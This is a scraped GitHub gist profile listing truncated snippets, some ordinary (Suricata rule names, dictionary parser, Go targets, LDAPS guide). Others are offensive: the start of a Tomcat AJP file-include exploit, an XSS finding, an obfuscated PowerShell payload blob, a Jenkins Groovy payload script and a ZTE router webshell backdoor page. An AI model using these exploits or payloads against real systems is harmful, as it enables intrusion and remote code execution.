Skip to content

Instantly share code, notes, and snippets.



  • Error: Unable to resolve
View GitHub Profile
xax007 / Suricata_Rules_Descriptionaa
Created June 3, 2019 05:27
View Suricata_Rules_Descriptionaa
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
xax007 /
Last active February 4, 2021 10:29
xax007 /
Created February 23, 2020 15:00
Aapche Tomcat AJP local file include and code execution exploit
#!/usr/bin/env python
#Tomcat-Ajp lfi
import struct
# Some references:
# [url][/url]
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
xax007 /
Last active November 20, 2019 16:30


Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
xax007 /
Created May 5, 2019 06:43 — forked from josephg/
Apple dictionaries
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mohave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/'
f = open(filename, 'rb')
View newol.dat
This file has been truncated, but you can view the full file.
$epGjM = [Char[ ] ]"))93]rAhc[]GNiRtS[,'tprT'(ECalPer.)63]rAhc[]GNiRtS[,)55]rAhc[+18]rAhc[+411]rAhc[+28]rAhc[+211]rAhc[((ECalPer.)'|',)77]rAhc[+79]rAhc[+94]rAhc[+38]rAhc[+15]rAhc[((ECalPer.)43]rAhc[]GNiRtS[,'VMbWd'(ECalPer.)'
)tprTtprTNiOJ-tprTXtprT+]3,1[)(GnIRTSOt.EcneREfeRpesoBrEv7QrRp (. Ma1S3)69]rahc[,)89]rahc[+99]rahc[+79]rahc[+511]rahc[+84]rahc[( ecALPER- 43]rahc[,tprTmHLYsJtprT EcALpERc- 63]rahc[,tprTGDuihltprTecALPER-421]rahc[,tprTstMqQztprT ecALPER- 29]'+'rahc[,)35]rahc[+121]rahc[+89]rahc[+87]rahc[+45]rahc[+84]rahc[( ecALPER-93]rahc[,)17]rahc[+111]rahc[+27]rahc[+911]rahc[+68]rahc[+67]rahc[( EcALpERc-))tprTAvDREPQQ8Y0iEBjd3DEAAAAu8YWAEJ9MBAWjEBAAAoZhPAchAAAASm+3LG0//TUkoDgCKIVFNiEIkQUiIBgCK4XBNy0zLGEAKUAtF0ISAAw9HmbQGsOAAcv65GEAAAgypDgJDm0///rAoDXSLiUC0lchI5wiJBAAAQOhPAchYv4//TcboDXSLikDLmEAAAg+F+AwFi9i//f3DjuzLi00La8iNx8iFR+MFNAdAX4//vnToP9iLcXG7IBdJXISY50iIdwVIawRIiA6BL8iFcEiQgewCvIBHhIGoHswL+xiBlDBJiDBLCAAAQQrE0IOkw0iIJxcAAAAgSCl58fVNCAABsWhPAchYv4//TM9oDXTLm0DJGEAAAAkkw7iMBAAA87hPAAAAAIJMuDyLMg
xax007 /
Created April 11, 2019 02:30 — forked from asukakenji/
Go (Golang) GOOS and GOARCH

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, ie. without the help of a C compiler, etc.)

  • android
  • darwin
xax007 /
Created March 16, 2019 09:09 — forked from Tom4t0/
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft active directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
class Dummy{ }
xax007 / web_shell_cmd.gch
Created November 30, 2018 11:32
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
View web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""">
<html xmlns="">
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
F460 Webshell